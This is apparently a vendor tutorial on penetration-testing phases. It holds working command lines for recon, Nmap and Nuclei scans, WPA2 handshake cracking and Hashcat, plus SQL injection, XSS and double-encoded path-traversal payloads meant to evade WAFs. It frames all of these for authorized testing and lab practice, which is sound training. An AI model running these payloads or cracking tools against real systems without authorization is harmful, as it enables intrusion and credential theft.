Skip to content

Ethical Hacking Basics -- Recon, Scanning, Exploitation & Reporting

DodaTech Updated 2026-06-22 6 min read

Ethical hacking is the authorized simulation of cyberattacks to identify vulnerabilities before malicious actors exploit them -- following a structured methodology of reconnaissance, scanning, exploitation, and reporting.

What You'll Learn

You will learn the five phases of ethical hacking, use tools like Nmap and Metasploit for recon and exploitation, and write professional penetration test reports that drive remediation.

Why It Matters

The global cybersecurity workforce faces a 4 million person shortage. Organizations must find vulnerabilities proactively. Ethical hackers earn an average of $120,000 per year and perform critical work protecting infrastructure.

Real-World Use

A penetration tester for a healthcare provider discovers an unauthenticated SQL injection in the patient portal during the scanning phase. The report enables the engineering team to patch before an attacker finds and exploits it.

Phase 1: Reconnaissance

Reconnaissance gathers information about the target without direct interaction.

# Passive recon with Amass
amass enum -d example.com -o recon-results.txt

# Subdomain enumeration
sublist3r -d example.com -o subdomains.txt

# DNS enumeration
dnsrecon -d example.com -t axfr

Expected output: Lists of subdomains, IP addresses, mail servers, and name servers associated with the target domain.

Open Source Intelligence (OSINT) Tools

# Collect email addresses associated with a domain
theHarvester -d example.com -b google,linkedin,bing

# Discover subdomains and related certificates
curl -s "https://crt.sh/?q=%25.example.com&output=json" | jq -r '.[].name_value' | sort -u

# Check data breaches for company emails
h8mail -t company.com -bc /path/to/breach-compilation.txt

Expected output: Lists of email addresses, employee names, subdomains, and potentially breached credentials that inform the attack surface.

Phase 2: Scanning

Scanning identifies live hosts, open ports, and running services.

# TCP SYN scan (stealth)
nmap -sS -sV -O -p- --min-rate 5000 -oA nmap-full target.com

# Service and version detection
nmap -sV -p 80,443 --script=http-headers,http-title target.com

Expected output: A complete port inventory with service versions. Open ports 22 (SSH), 80 (HTTP), 443 (HTTPS), and 3306 (MySQL) would each indicate different attack surfaces.

# Nmap result example
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.9p1 Ubuntu
80/tcp   open  http       nginx 1.24.0
443/tcp  open  http       nginx 1.24.0
3306/tcp open  mysql      MySQL 8.0.35

Vulnerability Scanning with Nuclei

# Install Nuclei from ProjectDiscovery
nuclei -u https://target.com -t cves/ -t misconfiguration/ -t exposures/

# Scan for specific OWASP Top 10 categories
nuclei -u https://target.com -tags sqli,xss,idor,lfi -severity critical,high

# Export results for reporting
nuclei -u https://target.com -json -o nuclei-results.json

Expected output: Nuclei identifies CVEs matching the target technology stack, misconfigurations like exposed .git directories or default credentials, and information disclosure endpoints.

Phase 3: Enumeration

Enumeration extracts detailed information from discovered services.

# Web directory enumeration
gobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt -o dirs.txt

# HTTP header inspection
curl -sI https://target.com | grep -i '\(server\|x-powered-by\|x-frame-options\)'

Expected output: Directory listings, admin panels, backup files, and server header information revealing the technology stack.

Wireless Security Assessment

Testing wireless networks requires specialized tools and techniques.

# Enable monitor mode on wireless interface
airmon-ng start wlan0

# Capture beacon frames and probe requests
airodump-ng wlan0mon

# Crack WPA2 handshake (ethical testing only)
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b <bssid> capture-01.cap

Expected behavior: The wireless adapter switches to monitor mode and captures nearby access points and clients. A WPA2 handshake is captured between a client and access point, then cracked offline.

Phase 4: Exploitation

Exploitation attempts to demonstrate impact using discovered vulnerabilities.

# Basic SQL injection test
import requests

payload = "' OR '1'='1"
url = f"https://target.com/login?username=admin&password={payload}"
response = requests.get(url)

if "Welcome" in response.text:
    print("SQL injection likely successful")

Expected behavior: If the application returns a success page instead of an error, the login form is vulnerable to SQL injection.

# Metasploit basic usage
msfconsole
search cve:2026 type:exploit
use exploit/multi/http/struts2_content_type
set RHOSTS target.com
set RPORT 8080
check

Expected output: Metasploit confirms the target is vulnerable and provides a check result of "The target appears to be vulnerable."

Web Application Firewall Evasion

Test how WAFs handle common evasion techniques during penetration tests.

# SQL injection with comment obfuscation
curl "https://target.com/search?q=admin'/**/OR/**/1=1--"

# XSS with Unicode encoding
curl "https://target.com/search?q=<sCrIpt>alert(1)</sCrIpT>"

# Path traversal with double encoding
curl "https://target.com/download?file=%252e%252e%252fetc%252fpasswd"

Expected behavior: A well-configured WAF blocks these obfuscated payloads. A misconfigured WAF passes them through, revealing the application is vulnerable despite having a web application firewall.

Password Cracking with Hashcat

When you extract password hashes, Hashcat cracks them using GPU acceleration.

# Identify hash type
hashid -m '$2y$12$T8w2S0YKG0RFF8VxjKFHPO'

# Crack bcrypt hashes with wordlist
hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt --show

# Mask attack for 8-character alphanumeric passwords
hashcat -m 1000 ntlm-hashes.txt -a 3 ?a?a?a?a?a?a?a?a --increment

Expected output: Recovered plaintext passwords are displayed with the hash type and cracking speed. Bcrypt (mode 3200) cracks at approximately 200 hashes per second on consumer GPU, while NTLM (mode 1000) cracks at 20 billion hashes per second.

Phase 5: Reporting

Every finding requires clear, actionable documentation.

Severity Finding CVSS Recommendation
Critical SQL injection on login endpoint 9.8 Parameterize all queries
High SSL certificate expired 7.5 Renew and automate renewal
Medium Missing CSP headers 5.0 Add Content-Security-Policy
Low Server header discloses version 2.5 Hide server version string

Common Errors

  1. Scanning without authorization -- Running Nmap against a target without written permission is illegal in most jurisdictions. Always obtain a signed scope-of-work document first.

  2. Relying solely on automated tools -- Tools miss business logic flaws like IDOR, race conditions, and privilege escalation. Manual testing is essential.

  3. Skipping the enumeration phase -- Moving directly from scanning to exploitation misses critical context. Enumerate every service -- directory listings, API endpoints, and version-specific CVEs.

  4. Destructive testing in production -- SQL injection can delete tables, and buffer overflows can crash services. Test in staging environments or use safe payloads.

  5. Poor report writing -- Technical findings without business impact or remediation steps get ignored. Write for both the CISO (executive summary) and the developer (technical details).

Practice Questions

  1. What is the difference between active and passive reconnaissance? Passive recon uses public sources like DNS records, search engines, and social media without touching the target. Active recon involves direct interaction like scanning and probing.

  2. Why use a SYN scan (-sS) instead of a full connect scan? SYN scan sends only the first packet of the TCP handshake and never completes it, making it faster and less likely to be logged by applications that log full connections.

  3. What does CVSS score 9.8 indicate? A CVSS of 9.8 is Critical severity -- typically a remotely exploitable vulnerability with no authentication required and high impact on confidentiality, integrity, and availability.

  4. How do you verify a SQL injection is not a false positive? Confirm by extracting actual database information (version, user, database name) through the injection, or by observing different response times in time-based injections.

  5. Challenge: Set up a vulnerable VM (DVWA or Metasploitable), perform a full penetration test through all five phases, and write a professional report with at least five findings including CVSS scores and remediation steps.

Mini Project

Conduct a penetration test against a deliberately vulnerable target like HackTheBox or TryHackMe. Document every step from reconnaissance through exploitation. Write a five-page report with an executive summary, technical findings, CVSS scores, and prioritized remediation recommendations.

Built by the developers of Doda Browser, DodaZIP, and Durga Antivirus Pro.

Built by the developers of DodaTech

Doda Browser, DodaZIP & Durga Antivirus Pro